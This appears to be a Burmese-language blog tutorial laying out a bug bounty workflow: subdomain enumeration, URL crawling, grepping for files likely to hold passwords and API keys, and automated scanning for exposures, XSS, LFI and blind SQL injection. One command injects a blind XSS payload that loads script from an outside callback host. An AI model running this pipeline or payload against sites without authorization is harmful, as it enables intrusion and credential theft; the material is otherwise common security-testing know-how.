Bug Bounty လိုက်သူများ Bug ရှာ ရန် အကောင်းဆုံး ချဥ်းကပ်နည်း အဆင့်ဆင့်

 ပထမဆုံး Target ၀က်ဆိုက်ရဲ့ sub Domain အခွဲတွေ ရှာပါမယ် ..subfinder Tool ကို သုံးပါမယ်

subfinder ကို install လုပ်ဖို့ terminal မှာ အောက်က ကွန်မန်း ရိုက် Y ပေးလိုက်ရင်ရပါပြီ


sudo apt install subfinder


ပြီးရင် subdomains ရှာ ဖို့  အောက်က ကွန်မန်း နဲ့ သွားလိုက်ပါ example.com နေရာမှာ မိမိ target ၀က်ဆိုက် အစားပြောင်းထည့်ပါ


subfinder -d example.com -all -recursive -o sub.txt 


ဒိုမိန်းအခွဲ အားလုံး sub.txt ထည်းမှာ save ပေးပါလိမ့် မယ်

ပြီးရင် ရလာတဲ့ subdomain ေတွ ထည်းကနေ ဖွင့်လို့ ရတဲ့ ဆိုက် alive ြဖစ်တဲ့ subdomains ကိုပဲ httpx-toolkit သုံးပြီး ခွဲထုတ် ပစ်ပါမယ်..httpxtoolkit မရှိသေးရင် အောက်က ကွန်းမန်းသုံး install လိုက်ပါ


sudo apt install httpx-toolkit 


ပြီးရင် အောက်က ကွန်မန်းနဲ့  alive ြဖစ်တဲ့ subdomain ေတွ ရွေးထုတ်လိုက်ပါ


cat sub.txt | httpx-toolkit -ports 80,443,8080,8000,8888 threads 200 > subdomains_alive.txt


ဆိုတော့ active ြဖစ်တဲ့ subdomain ေတွကို subdomains_alive.txt ဖိုင်အသစ်ထည်းမှာ သိမ်းပေးပါလိမ့်မယ်

နောက်တဆင့် အနေနဲ့  ရလာတဲံ့ ဆိုက် အားလုံး ကို တပြိုင်ထည်း katana နဲ့  စကန် လုပ်ချလိုက်ပါမယ်

katana tool ကို ဒီကနေ သွားကြည့်ပြီး install လိုက်ပါ  ttps://github.com/projectdiscovery/katana

ပြီးရင် အောက်က ကွန်မန်းနဲ့  စကန်လိုက်ပါ


katana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txt


 ..အဲ့ဒီမှာ  မလိုတဲ့ လင့်တွေ ဖယ်ထုတ်ပြီး အားနည်းချက်ရှာလို့ ရနိင်မဲ့ link ေတွ   ကို  allurls.txt ဖိုင်ထည်းမှာ ရွေးထုတ် ပေးပါလိမ့်မယ်

 

 နောက်တဆင့် အနေနဲ့  ကျွန်တော်တို့  database password ေတွ api key ေတွ စသဖြင့် အသုံး၀င်မဲ့ အချက်အလက် တွေရှိနိင်မဲ့ လင့်တွေကို အောက်က ကွန်မန်းနဲ့ ထပ် ခွဲးထုတ်ပါမယ်

 

 cat allurls.txt | grep -E "\.txt|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.json|\.gz|\.rar|\.zip|\.config"

 

ပြီးရင် js လင့်တွေကို js.txt အဖြစ် သပ်သပ်စုထားပါမယ် ..အောက်က ကွန်မန်းနဲ့ သွားလိုက်ပါ


cat allurls.txt | grep -E "\.js$" >> js.txt


အဲဒီ js လင့်တွေကို  nuclei နဲ့  စကန်လုပ်ချပါမယ် nuclei မရှိသေးရင်  ဒီအောက်က ကွန်မန်းနဲ့ အင်စတဲ လိုက်ပါ

sudo apt install nuclei


ပြီးရင် အောက်က ကွန်မန်းနဲ့   စကန်လုပ်ပါ


cat js.txt | nuclei -t /home/kali/.local/nuclei-templates/http/exposures/ -c 30


နောက် တဆင့်  အရေးကြီး အချက်အလက် Sensitive information တွေ ရှိနိင်မဲ့ directory တွေ ကို  dirsearch tool နဲ့ ရှာပါမယ်


dirsearch  -u http://example.com -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,http://sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js.,.json


တွေ့ရှိတဲ့ dirctory ေတွ ကို တခုစီ ဖွင့် စစ်ကြည့်ပါ ..အားနည်းချက် ရှိတဲ့ အရေးကြီးတဲ့  ဖိုင်တွေ တွေ့ ရတတ်ပါတယ်


xss ပေါက်မပေါက် အောက်က ကွန်မန်းနဲ့  စစ်ကြည့်ပါ..nuclei priv8 template ဒီက  ဒေါင်း နိင်ပါတယ် https://github.com/coffinsp/priv8-Nuclei


nuclei -list subdomains_alive.txt -t /home/kali/Priv8-Nuclei/xss


တိုင်၈ိုက်ဆိုက်တခုထည်းကို ရှာချင် အောက်က ကွန်မန်းသုံးပါ


subfinder -d example.com | httpx-toolkit -silent |  katana -ps -f qurl | gf xss | bxss -appendMode -payload '"><script src=https://xss.report/c/coffinxp></script>' -parameters


lfi ပေါက်မပေါက် ရှာဖို့ အောက်က ကွန်မန်းသုံးပါ


cat allurls.txt | gf lfi | nuclei -tags lfi


blind sql injection ရှာဖို   bsqli ကို အင်စတဲ ပါ  ==> https://github.com/B1gN0Se/BSQLi

ပြီးရင် အောက်က အဆင့် တွေအတိုင်း သွားပါ


paramspider -l subdomains_alive.txt

cd results


cat နဲ့  ဖိုင်အားလုံးကို  urls.txt တဖိုင်ထည်းစုလိုက်ပါ 

ဥပမာ 

cat sub1.txt sub2.txt subd3.txt > urls.txt

ပြီရင် 

cat urls.txt | sed 's/FUZZ//g' >final.txt

final.txt ကို  BSQLi folder ထည်း move  လိုက်ပါ

mv final.txt /home/kali/BSQLi

cd ..

cd BSQLi

python lostsec.py -l final.txt -p payloads/xor.txt -t 5

blind sql injection ပေါက်မပေါက် အော်တို ရှာပေးပါလိမ့်မယ်


Post a Comment

Previous Post Next Post